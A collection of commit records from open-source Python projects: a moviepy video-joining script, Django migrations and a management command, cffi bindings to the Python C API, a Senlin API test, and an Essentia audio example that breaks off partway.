Add script to create single movie file from others horizontally
|
Python
|
mit
|
NGTS/frame-movies,NGTS/frame-movies
|
Add script to create single movie file from others horizontally
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
<commit_before><commit_msg>Add script to create single movie file from others horizontally<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
Add script to create single movie file from others horizontally#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
<commit_before><commit_msg>Add script to create single movie file from others horizontally<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
|
5cb6057240fd296dbce36829366611b30cdaab29
|
gem/migrations/0027_set_site_settings_correctly.py
|
gem/migrations/0027_set_site_settings_correctly.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
Add migration to set UserProfilesSettings correctly
|
Add migration to set UserProfilesSettings correctly
|
Python
|
bsd-2-clause
|
praekelt/molo-gem,praekelt/molo-gem,praekelt/molo-gem
|
Add migration to set UserProfilesSettings correctly
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
<commit_before><commit_msg>Add migration to set UserProfilesSettings correctly<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
Add migration to set UserProfilesSettings correctly# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
<commit_before><commit_msg>Add migration to set UserProfilesSettings correctly<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
|
383882ff8078efa3e368cde1bde96279eb0b3b5d
|
apps/gallery/migrations/0003_auto_20151015_0005.py
|
apps/gallery/migrations/0003_auto_20151015_0005.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
Add meta class migration for responsiveimage
|
Add meta class migration for responsiveimage
|
Python
|
mit
|
dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4
|
Add meta class migration for responsiveimage
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
<commit_before><commit_msg>Add meta class migration for responsiveimage<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
Add meta class migration for responsiveimage# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
<commit_before><commit_msg>Add meta class migration for responsiveimage<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
|
3edef1b1876014298d53f7ac667af46b841432c5
|
sift/concerts/management/commands/add_artists.py
|
sift/concerts/management/commands/add_artists.py
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
Add mgmt command to add artists to DB
|
Add mgmt command to add artists to DB
|
Python
|
mit
|
industryjhr/sift_app,industryjhr/sift_app,jravesloot/sift_app,jravesloot/sift_app
|
Add mgmt command to add artists to DB
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
<commit_before><commit_msg>Add mgmt command to add artists to DB<commit_after>
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
Add mgmt command to add artists to DB"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
<commit_before><commit_msg>Add mgmt command to add artists to DB<commit_after>"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
|
bd609e591f8eac5bf50221b41df37da27e026afb
|
pymetabiosis/bindings.py
|
pymetabiosis/bindings.py
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
Add the binding to the C API
|
Add the binding to the C API
|
Python
|
mit
|
prabhuramachandran/pymetabiosis,rguillebert/pymetabiosis
|
Add the binding to the C API
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
<commit_before><commit_msg>Add the binding to the C API<commit_after>
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
Add the binding to the C APIfrom cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
<commit_before><commit_msg>Add the binding to the C API<commit_after>from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
|
400369a4905876bc523631dfd75518a04dab069c
|
senlin/tests/tempest/api/policies/test_policy_validate.py
|
senlin/tests/tempest/api/policies/test_policy_validate.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
Add API tests for policy validation
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b
|
Python
|
apache-2.0
|
openstack/senlin,stackforge/senlin,stackforge/senlin,openstack/senlin,openstack/senlin
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
<commit_before><commit_msg>Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b<commit_after>
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
<commit_before><commit_msg>Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b<commit_after># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
|
e76553404834de2f1123bd545922caab28e16375
|
src/examples/tutorial/example_rhythmtransform.py
|
src/examples/tutorial/example_rhythmtransform.py
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
Add python example for RhythmTransform
|
Add python example for RhythmTransform
|
Python
|
agpl-3.0
|
MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,carthach/essentia,arseneyr/essentia
|
Add python example for RhythmTransform
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
